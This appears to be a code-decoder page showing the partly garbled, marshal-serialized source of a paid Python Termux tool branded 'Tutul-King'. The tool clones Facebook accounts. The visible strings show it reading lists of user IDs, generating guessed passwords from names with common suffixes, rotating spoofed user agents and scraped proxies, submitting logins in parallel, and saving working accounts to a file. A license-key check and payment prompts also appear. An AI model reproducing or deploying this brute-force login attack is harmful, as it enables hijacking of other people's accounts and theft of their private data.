Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

# Encoded By Tutul-King # Fb Link: https://www.facebook.com/Tutul.King.Ok.Bro # Fb Link:..

Decoded Output download

<? # Encoded By Tutul-King 
# Fb Link: https://www.facebook.com/Tutul.King.Ok.Bro 
# Fb Link: https://www.facebook.com/Tutul.Official.Account 
# https://github.com/Tutul-King 
 
import marshal 
exec(marshal.loads(b'@ddlZeejddS)Ns@ddlZeejddS)Ns@ddlZeejddS)Ns@ddlZeejddS)Ns~@ddlZeejddS)Ns}@ddlZeejddS)Ns|@ddlZeejddS)Ns{@ddlZeejddS)Nsz@ddlZeejddS)Nsy@ddlZeejddS)Nsx@ddlZeejddS)Nsw@ddlZeejddS)Nsv@ddlZeejddS)Nsu@ddlZeejddS)Nst@ddlZeejddS)Nss@ddlZeejddS)Nsr@ddlZeejddS)Nsq@ddlZeejddS)Nsp@ddlZeejddS)Nso@ddlZeejddS)Nsn@ddlZeejddS)Nsm@ddlZeejddS)Nsl@ddlZeejddS)Nsk@ddlZeejddS)Nsj@ddlZeejddS)Nsi@ddlZeejddS)Nsh@ddlZeejddS)Nsg@ddlZeejddS)Nsf@ddlZeejddS)Nse@ddlZeejddS)Nsd@ddlZeejddS)Nsc@ddlZeejddS)Nsb@ddlZeejddS)Nsa@ddlZeejddS)Ns`@ddlZeejddS)Ns_@ddlZeejddS)Ns^@ddlZeejddS)Ns]@ddlZeejddS)Ns\@ddlZeejddS)Ns[@ddlZeejddS)NsZ@ddlZeejddS)NsY@ddlZeejddS)NsX@ddlZeejddS)NsW@ddlZeejddS)NsV@ddlZeejddS)NsU@ddlZeejddS)NsT@ddlZeejddS)NsS@ddlZeejddS)NsR@ddlZeejddS)NsQ@ddlZeejddS)NsP@ddlZeejddS)NsO@ddlZeejddS)NsN@ddlZeejddS)NsM@ddlZeejddS)NsL@ddlZeejddS)NsK@ddlZeejddS)NsJ@ddlZeejddS)NsI@ddlZeejddS)NsH@ddlZeejddS)NsG@ddlZeejddS)NsF@ddlZeejddS)NsE@ddlZeejddS)NsD@ddlZeejddS)NsC@ddlZeejddS)NsB@ddlZeejddS)NsA@ddlZeejddS)Ns@@ddlZeejddS)Ns?@ddlZeejddS)Ns>@ddlZeejddS)Ns=@ddlZeejddS)Ns<@ddlZeejddS)Ns;@ddlZeejddS)Ns:@ddlZeejddS)Ns9@ddlZeejddS)Ns8@ddlZeejddS)Ns7@ddlZeejddS)Ns6@ddlZeejddS)Ns5@ddlZeejddS)Ns4ddlZddlZejdddlZddlZddlZddlZddlZddlZddlZddlZddl	Z	ddl
Z
ddlZddlZddl
Z
ddlZddlmZddlmZddlZddlZddlZddlZddlZddlZddlZddl	Z	ddl
Z
ddlZddlZddlZddlZddlZddlZddlmZddlmZddlmZddlmZddlmZdd	lm Z!dd
lm"Z#ddl$m%Z&ddl\'m(Z)dd
lm"Z*dd
lm+Z+ddl,m-Z.ddlZddlZddlZddlZddlZddlZddlZddlZddl	Z	ddl
Z
ddlZddlZddl
Z
ddlZddlmZddlmZe+j/eZ0dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1dgZ1d gZ1d!gZ1d"gZ1d#gZ1d$gZ1d%gZ1d&gZ1d\'gZ1d(gZ1d)gZ1d*gZ1d+gZ1d,gZ1d-gZ1d.gZ1d/gZ1d0gZ1d1gZ1d2gZ1d3gZ1d4gZ1d5gZ1d6gZ1d7gZ1d8gZ1d9gZ1d:gZ1d;gZ1d<gZ1d=gZ1d>gZ1d?gZ1d@gZ1dAZ2ddlZddlZddl	Z	ddlZGdBdCZ3dDZ4dEZ5dFZ6dGZ7dHZ8dIZ9dJZ:dKZ;dLZ<dMZ=dNZ>dOZ?dPZ@dQZAdRZBdOZCdSZDdTZEdUZFdVZGdWZHdXZIdYZJdZZKd[ZLd\ZMejNOd]gZPgZQgZRejSZTgZU	ejVd^jWZXeYd_d`OeXn#eZ$rZ[e"daYdZ[[[ndZ[[[wwxYweYd_db\]ZXe^dcD]oZ_ddZ`ejadedfZbejadedfZcdgZdejadhdiZ[djZeejadedfZfejadedkZgejadedkZhejadedkZidlZje`ebdmecdnede[eeefdmegdmehdmeidnejZkePlekdoZmejngdpZbdqZcejngdrZdejadedsZ[ejngdrZedtZfejadudhZgdvZhejadwdxZiejadydzZjd{Zoemdnebd|ecede[eed}efegdmehdmeidmejdneoZpeQlepqd~Zkggdddggggggggf
\
ZqZrasatauZvZwZxZyZzZ{Z|Z}gZRdZ~dZMdHZdZdZ@dZd[ZdZ8dZdZdZdFZdIZjdHZgdZdKZdZdZbdZejneejegeebgZdZdZejjddyZejjddZ	eYddb\Zn?#eYdd`ZeOeezeYnxYweYddb\ZGddZdZdZdZdZdZejdeedZddlZdZedkr?edZedZedkredkrednededez
ZEdZdZdZdZdZedkr0ejdn#YnxYwejdn#YnxYwedS)Nzpkg install espeak)ThreadPoolExecutor)datetime)Table)Console)
BeautifulSoup)Group)Panel)print)Markdown)Columns)pretty)TextzMozilla/5.0 (Linux; Android 7.1.1; ASUS_X00HD Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/186.0.0.48.81;]zMozilla/5.0 (Linux; Android 7.1.2; ONE A2003 Build/NJH47F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.83 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 8.0.0; STF-L09 Build/HUAWEISTF-L09; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/184.0.0.41.79;]aMozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Mobile/15D100 [FBAN/FBIOS;FBAV/163.0.0.54.96;FBBV/96876057;FBDV/iPhone9,4;FBMD/iPhone;FBSN/iOS;FBSV/11.2.6;FBSS/3;FBCR/NOS;FBID/phone;FBLC/pt_PT;FBOP/5;FBRV/98697066]zMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; Microsoft Outlook 14.0.7210; ms-office; MSOffice 14)zMozilla/5.0 (Linux; Android 6.0.1; HTC Desire 650 Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 5.1; HUAWEI TIT-L01 Build/HUAWEITIT-L01; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/175.0.0.23.81;]zMozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; SLCC2; Media Center PC 6.0; Tablet PC 2.0; Zune 4.7)zMozilla/5.0 (Linux; Android 7.0; SM-N920T Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 7.0; SM-A320FL Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/171.0.0.49.92;]zMozilla/5.0 (Linux; Android 5.1.1; SM-J111F Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/168.0.0.40.90;]zMozilla/5.0 (Linux; Android 5.1; 5015D Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/144.0.0.27.91;]zMozilla/5.0 (Linux; Android 7.1.1; ZTE Blade A522 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.68 Mobile Safari/537.36zmMozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302zMozilla/5.0 (Linux; Android 7.0; K6000 Pro Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/170.0.0.52.95;]aMozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 [FBAN/FBIOS;FBAV/183.0.0.41.81;FBBV/119182652;FBDV/iPhone7,2;FBMD/iPhone;FBSN/iPhone OS;FBSV/9.3.2;FBSS/2;FBCR/O2;FBID/phone;FBLC/en_GB;FBOP/5;FBRV/119541743]zMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0E; .NET4.0C; FSTE)zMozilla/5.0 (Linux; Android 7.1.1; ASUS_Z01HD Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/172.0.0.66.93;]zMozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJS25.93-14-4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 4.4.2; Edison 3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Safari/537.36zmMozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Mobile/15D60zMozilla/5.0 (Linux; Android 5.1.1; LG-K120 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36[FBAN/EMA;FBLC/pt_PT;FBAV/75.0.0.37.188;]zMozilla/5.0 (Linux; Android 6.0; Aquaris_A4.5 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 7.1.1; ASUS_X00HD Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/185.0.0.39.72;]zMozilla/5.0 (Linux; Android 5.1; HUAWEI LYO-L01 Build/HUAWEILYO-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.70 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 6.0; U FEEL LITE Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.85 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 4.4.2; MOCHE SMART A16 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36a
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15G77 [FBAN/FBIOS;FBAV/182.0.0.42.80;FBBV/118457561;FBDV/iPhone8,2;FBMD/iPhone;FBSN/iOS;FBSV/11.4.1;FBSS/3;FBCR/BouyguesTelecom;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]zMozilla/5.0 (Linux; Android 6.0.1; vivo 1606 Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/64.0.3282.137 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/153.0.0.54.88;]zMozilla/5.0 (Linux; Android 6.0.1; vivo 1606 Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/64.0.3282.137 Mobile Safari/537.36aMozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/184.0.0.40.79;FBBV/119872175;FBDV/iPhone7,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/vodafoneP;FBID/phone;FBLC/pt_PT;FBOP/5;FBRV/0]zmMozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36aMozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36 [FBAN/FBIOS;FBAV/183.0.0.41.81;FBBV/119182652;FBDV/iPhone4,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/9.3.5;FBSS/2;FBCR/Sunrise;FBID/phone;FBLC/pt_PT;FBOP/5;FBRV/119807530]zMozilla/5.0 (Linux; Android 7.1.1; SM-T555 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Safari/537.36 [FB_IAB/FB4A;FBAV/164.0.0.44.95;]zMozilla/5.0 (Linux; Android 6.0; U FEEL Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.81 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/175.0.0.40.97;]zMozilla/5.0 (Linux; Android 4.4.4; Y635-L01 Build/HuaweiY635-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36[FBAN/EMA;FBLC/es_ES;FBAV/88.0.0.6.182;]zMozilla/5.0 (Linux; Android 7.0; U22 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.111 Mobile Safari/537.36aMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET CLR 1.1.4322; .NET4.0E; InfoPath.3; Microsoft Outlook 15.0.4971; ms-office; MSOffice 15)zMozilla/5.0 (Linux; Android 6.0.1; Neffos Y5 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.68 Mobile Safari/537.36zmMozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27zMozilla/5.0 (Linux; Android 11.0; Build/RTM3.211215.018) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.0 Safari/537.36 CrKey/1.56.500000 DeviceType/AndroidTVaMozilla/5.0 (Linux; Android 13; SM-A035M Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.144 Mobile Safari/537.36 Instagram 312.1.0.34.111 Android (33/13; 280dpi; 720x1471; samsung; SM-A035M; a03; ums9230_25c10; pt_BR; 548323749)zMozilla/5.0 (Linux; Android 13; 2201117TL Build/TKQ1.221114.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.144 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/445.0.0.34.118;]zMozilla/5.0 (Linux; Android 11; Multilaser_GMAX_2 Build/V8_20230215; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.144 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/445.0.0.34.118;]zMozilla/5.0 (Linux; Android 10; moto g(7) play Build/QPYS30.52-22-14; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/118.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/444.0.0.31.114;]zMozilla/5.0 (Linux; Android 11; RMX2103 Build/RKQ1.201217.002) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.178 Mobile Safari/537.36aMozilla/5.0 (Linux; Android 13; 2212ARNC4L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.144 Mobile Safari/537.36 Instagram 312.1.0.34.111 Android (33/13; 320dpi; 720x1507; Xiaomi/Redmi; 2212ARNC4L; earth; mt6768; pt_BR; 548323754)zMozilla/5.0 (Linux; Android 13; HD65_PLUS Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.144 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 12; TECNO KI5k Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.144 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 10; Redmi 7A Build/QKQ1.191014.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/120.0.6099.125 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/445.0.0.34.118;]ct|dkr|dddvrd}n8|dddvrd}n(|dddvrd}n|dd	d
vrd}n|dd	dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dddvrd}n|dddvrd}n|dddvrd }nr|ddd!vrd"}nc|ddd#vrd$}nT|ddd%vrd&}nEd\'}nBt|d(vrd)}n.t|dkrd*}nt|d	krd+}nd,}|S)-N
)
10000000002009	)	100000000)10000000)100000010000011000002100000310000041000005)10000061000007100000810000092010)100001z	2010/2011)100002100003z	2011/2012)100004z	2012/2013)100005100006z	2013/2014)100007100008z	2014/2015)1000092015)10001z	2015/2016)10002z	2016/2017)10003z	2018/2019)100042019)100052020)100061000710008z	2021/20222023)rrz	2008/2009z	2007/2008z	2006/2007z	2023/2024)len)fxtutulxzs 	Tutulkingtutulxr?SsGGRKKWgg	"1"vgg	"1"vgg	"1"vNNNY_ww	"1"v:::V77	"1"vgg	"1"v$$$gg	"1"vgg	"1"v$$$gg	"1"v$$$gg	"1"vgg	"1"vgg	"1"vgg	"1"vgg	"1"vgg	"1"vgg	"1"v***[77ww	"gg\'\'	"ggqjj\'\'	"ggqjj\'\'gceZdZdZdS)TUTULc|dzD]S}tj|tjt	jdTdS)N
g?sysstdoutwriteflushtimesleep)selfzes  r>__init__zTUTUL.__init__rs\T		AJQJJu		r@N)__name__
__module____qualname__rOr@r>rBrBqs#r@rBz[10;30mz[10;97mz[10;91mz[10;41mz[10;92mz[10;93mz[10;94mz[10;95mz[32;45mz[38;5;196mz[1;33mz
[38;5;48mz	[38;5;8mz
[38;5;46mz
[38;5;47mz
[38;5;49mz
[38;5;50mz[1;34mz
[38;5;14mz[38;5;123mz[38;5;122mz
[38;5;86mz[38;5;121mz[1;96mz[38;5;205mz[1;37m]2; Tutul Kingzwhttps://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=allz	.prox.txtwz [[[1;92m+[1;97m] [[1;96mTutulri\'z!Mozilla/5.0 (Symbian/3; Series60/rNokiadi\'zl/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/zMobile Safari/535.1. z[Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B663961620A118780T1390849P1))23456789101112131415z en-us; GT-)ABCDEFGHIJKLMNOPQRSTUVWXYZiz.AppleWebKit/537.36 (KHTML, like Gecko) Chrome/I0ihi$(z
Safari/537.36z; z) c	tdd}|D]}t|dS#tjdj}tdd}tj	dt|}|D]}||dztdd}YdSxYw)Nz	bbnew.txtrUz5https://github.com/Pro-Max-420/ua/blob/main/bbnew.txtz
.bbnew.txtrTzline">(.*?)<rD)openread
splitlinesugenappendrequestsgettextrefindallstrrH)uaubaaauns   r>uakurs
0	+c!!,,.."b;;r????0LHIIN!	,s"Zs1vv&&"b88BtG	,s ""--//""""s
AABC8z[1;97mz[1;91mz[1;93mz[1;94mz[1;95mz[0mz[1;30mz[41m[1;97mz[mz[32mz[33mz[10;96mz[0;34mc4ttddS)Nz/===============================================)r
rjrSr@r>linexrs	Q
?
?
?@@@@@r@cVtjdttdSNclear)ossystemr
logorSr@r>rrs!
	(
dr@r$z./data/data/com.termux/files/usr/lib/.myawm.txtceZdZdZdS)apvrovalcd}ddl}|}	||}t|}t
|vrt
dStdtt
d}tt|tdtdtjdtdtjdtjd	dS#t"$r(}t|t%Yd}~dSd}~wwxYw)
Nz<https://github.com/Ariyan-143/Tutul/blob/main/Tutul-Paid.txtru)[10;92m[10;97m[[92;1m+[10;97m] z[0;92mu[10;92m[10;97m[[92;1m[10;97m] [10;93m15 Days 500 Taka-!
[10;92m[10;97m[[92;1m[10;97m] [10;92m30 Days 900 Taka-!
[10;92m[10;97m[[92;1m+[10;97m] [10;93mFREE-FIRE-ID CLONING
[10;92m[10;97m[[92;1m[10;97m] [10;92mONLY ACTIVE ID CLONING
[10;92m[10;97m[[92;1m+[10;97m] [10;93mUnActive id Not Allow
[10;92m[10;97m[[92;1m[10;97m][10;92m Cp id Login 60%
[10;92m[10;97m[[92;1m+[10;97m] [10;93mWi-fi Working 80%[10;97muX[10;92m[0;97m[10;97m[[92;1m[10;97m][10;92m PRESS ENTER TO SEND KEY[0;97m%xdg-open https://wa.me/+8801608843956ud[10;92m>[0;97m[10;97m[[92;1m[10;97m] [0;41mKEY COPY AND PRESS ENTER TO SEND ADMIN[0;97m;)	mechanizeBrowserrrrMY_KEYloginropbannerr
TUTULjinputrrrJrK	Exceptionexit)urlrmy_awmhost	check_keylogo2rNs    r>checkzapvroval.checks^L""$$	;;s##DDIIKK((I""{Qe{gm{{{eH
I
I
I
EFFF	ABBBQRRR	ABBB
2			!HHHFFFFFFFFF	sA
D+B&D
EEEN)rPrQrRrrSr@r>rrs#r@rc|dzD]S}tj|tjt	jdTdS)NrDg~jth?rEurNs r>	alvino_xyrsQTSSA#***1---cj.>.>.@.@.@FASASASASSSr@c|dzD]S}tj|tjt	jdTdS)NrDgQ?rErs r>rrsQTRRA#***1---cj.>.>.@.@.@[email protected])rrrSr@r>rrs7r@c"tdS)N)rrSr@r>backrsr@cRtjdtdgdtdt
dtdt
dtdt
dtdtdt
dtdt
dtdt
dtdt
dtdtd	td
tdtdtd
tdttddS)Nru^
[0;92m
[0;91m [0;92m   [0;91m [0;92m   [0;91m [0;92m   
[0;91m   [0;92m    [0;91m  [0;92m    [0;91m  [0;92m  
[0;91m   [0;92m    [0;91m  [0;92m    [0;91m  [0;92m  
[0;91m   [0;92m    [0;91m  [0;92m    [0;91m  [0;92m  
[0;91m   [0;92m  [0;91m   [0;92m   [0;91m [0;92m 
[0;92m        [0;92m

u.>[0;41m[ WORKING WIFI+MOBILE DATA ][0;92mu<uA[0;92m[10;92m

[0;94m[1;33m 
uB[Author          [1;38mMR-TUTUL ]   
u>[Facebook         Tutul King ]    
u=[Github          Tutul-King ]   
u;[Whatsapp         01608843956 ]  
u>[TOOLS           PAID ]       
uX[VERSION          14.0 ]     [10;92m
[10;92m[Key:u[0;92m[10;92m
[0;94m[1;31m)rrr
joinlalrwrj	rrrSr@r>rr$s7	e	e	e	e	e	e	e	e	e	e
	e	e	e	e	e	e	e	e	e	e	e	e!$	e	e	e	e)*	e	e	e	e/2	e	e	e	egj	e	e	e	epq	e	e	e	evy	e	e	e	e~	e	e	e	eDG	e	e	e	eLM	e	e	e	eRU	e	e	e	eZ[	e	e	e	e	e	e	e	e	e	e	e	e	e	e	e	e	e	e	e	e !	e	e	e	e"#	e	e	e	e$%	e	e	e	e$2%	e	e$4:%	e	e	e	e	e	efffffr@z%espeak -a 300 " Your,  Real, Name,"uI[1;97m[[1;92m[1;97m][10;92m WHAT IS YOUR NAME [10;91m[10;32m lM?uQ[10;32m[10;97m[[10;92m[10;97m] [10;92mENTER USERNAME [10;91m[10;92m uQ[10;32m[10;97m[[10;92m[10;97m] [10;93mENTER PASSWORD [10;91m[10;93m TutulLoveu9[1;32m[10;97m[[10;92m[10;97m] [10;92mSuccessfullyuC[10;32m[10;97m[[10;92m[10;97m] Incorrect Pass Please Trying cttdtdtd}tjd|dvrtdS|dvrt
dS|dvrtdS|dvrtj	d	dS|d
vrtdStdtjdtdS)
Nu[10;92m[10;97m[[10;92m1[10;97m][10;92m FILE CLONING
[10;92m[10;97m[[10;92m2[10;97m] [10;93mCONTACT WITH ADMIN
[10;92m[10;97m[[10;92m0[10;97m] [1;91mEXIT uB[10;92m[1;97m=============================================uT[10;92m[10;92m[10;97m[[10;92m+[10;97m] [1;92mCHOOSE [10;91m[10;92m g{Gz?)m)1)i0ir\02r)ru6 [10;97m[[10;92m?[10;97m] [10;91mINPUT WRONG-!)rrrrJrKpublic
crack_fileresultrrrr)rBs r>rrMs	tuuuRSSS
|}}CIJNOOO	UNN(((((unn,,,,,z(((((z)344444unn&&&&&	MNNN*Q---&&&&&r@ctjdttjdtdt	d}tdt|}n8#tdtj
dtYnxYw|D]}t
|tdS)Nrzespeak -a 300 " your file name"ug[10;92m[1;32m[10;97m[[10;92m+[10;97m] [EXAMPLE [10;91m [10;92m/sdcard/File.txt Etc...]uX[10;92m[10;97m[[10;92m+[10;97m][38;5;208m YOUR FILE NAME [10;91m[10;92m rz2[10;97m[[10;92m?[10;97m] [10;91mFile Not Foundr)rrrr
rrrrrrJrKridrsetting)olinxids  r>rras7,---FGGG
z{{r77<<>>$$&&SS		IJJJ*Q---&&&&&S))C....s$3B3C
cd}|dvr3ttD]}t|n|dvrzg}ttD]}||t	|}|dz
}t|D]\'}t|||dz}(n|dvrMtD]D}t
jdt	t}t||EnLtD]D}t
jdt	t}t||Etdtjdtd	}|dvrtd
n9|dvrtdntd
ttdS)
Nr])r01rrV)r]03ru~[10;92m[10;97m[[10;92m+[10;97m][1;92m LOGIN SEXY
[10;92m[10;97m[[10;92m1[10;97m][1;93m METHOD SeX-! z!espeak -a 300 " 1, method, Sex"uM[10;92m[10;97m[[10;92m+[10;97m][10;92m CHOOSE [10;91m[10;97m mobile)rc09mbasic)sortedrid2rr;rangerandomrandintinsertr
rrrmethodpasswrdr)	hutuamudabacotbcmbcmixmudxxhcs	     r>rrqs	*
BZZc::c????J	$bzze;;u	$ii#A$Cjjd::d4j!844	JeqS""2::beqS""2::bghhh.///pqq*--J----r@ctjdttdtztdtt
tztdtdtdtd5}tD]}|
d	d
|
d	d}}|
dd
}g}t
|d
krt
|dkr||dz||dz||dz||dz||dz||dz||dz|||d||dz||dz||dz||dz||dz||dz||dz||dz||dz||d z||d!z||d"zt
|dkr||n||dz||dz||dz||dz||dz||dz||dz|||d||dz||dz||dz||dz||dz||dz||dz||dz||dz||d z||d!z||d"z|
t||	dddn#1swxYwYtd#td$td%td&t ztd\'t#d(dS))NruS[10;92m[10;97m[[10;92m+[10;97m][38;5;208m USER NAME[10;91m [10;96m uH[10;92m[10;97m[[10;92m+[10;97m] [10;92mTOTAL IDz [10;97m ur[10;92m[10;97m[[10;92m+[10;97m] [10;95mYOUR OK IDz SAVED[10;91m [10;95m/sdcard/TutulOk.txtuj[10;92m[10;97m[[10;92m+[10;97m] [10;92mTURN ON[10;91m/[10;92mOFF AIRPLANE MODE IN EVERY 5 MINuC[10;92m[10;97m=============================================)max_workers|rrVr[r$rrerf123123412345123456z
i love you@z@@z@@@z@@@@z@#z@@##z@#123z@12z@1231431122111uD
[10;92m[10;97m=============================================uK[10;92m[10;97m[[10;92m+[10;97m] [10;96mCLONING COMPLETE BRO-!ua[10;92m[10;97m[[10;92m+[10;97m] [10;92mCOMPLETE YOUR TOTAL OK IDz [10;91m[10;92m z%s uC[10;92m[10;97m=============================================uF[10;92m[10;97m[[10;92m+[10;97m] [10;91mCLICK ENTER TO EXIT )rrrrNameXrr;rtredrsplitlowerrsubmitcrackhokr)poolyuzongidfnmffrspwvs   r>rrs7styyzzzdehilmoipipeqeqqrrr	RSSS	JKKKTUUU
r7d66f
\\#

q
!&,,s"3"3A"6"<"<">">s3	3	3	3	#hhqjj
3xxzz	ZZCZZDZZDZZE	ZZF
ZZGZZHZZ___ZZZZCZZDZZE	ZZF
ZZDZZF
ZZGZZE	ZZF
ZZE	ZZF
ZZE	
3xxzzZZ____ZZCZZDZZDZZE	ZZF
ZZGZZHZZ___ZZZZCZZDZZE	ZZF
ZZDZZF
ZZGZZE	ZZF
ZZE	ZZF
ZZE	KKc#m6777777777777777rUVVVdeee	HBC	H	H	HJL	MNNNSTTT^_____s(SU;;U?U?c	tjtttt
ttg}tj	
d|dtdtttdttttd|dtdtdtd|ttdftj	tjt"}tjt$}t\'j}|D]}	tjt*}d	d
|zi}|jdd|d
dddddddddd
|d|zdz}	t3jdt7|	jdt3jdt7|	jd|dd|d}
dd |	j !D}|d!z
}dd"dd#d$|d
dddddd%ddd&}|"d\'|
d(|i|d)|*}
d+|
j #vrtjtttt
ttg}tIj%d,tMd-d.
|d/z|zd0ztN(|d1z|ztRdz
a)nd2|j #vr3tdz
a|
j }dd3|j !D}tjtttt
ttg}tUdtVd4|d/|d5tY|d6||d0tIj%d7tMd8d.
|d/z|zd9z|zd0zt[t\|n1#t&j/j0$rtcj2d:YwxYwtdz
adS);N
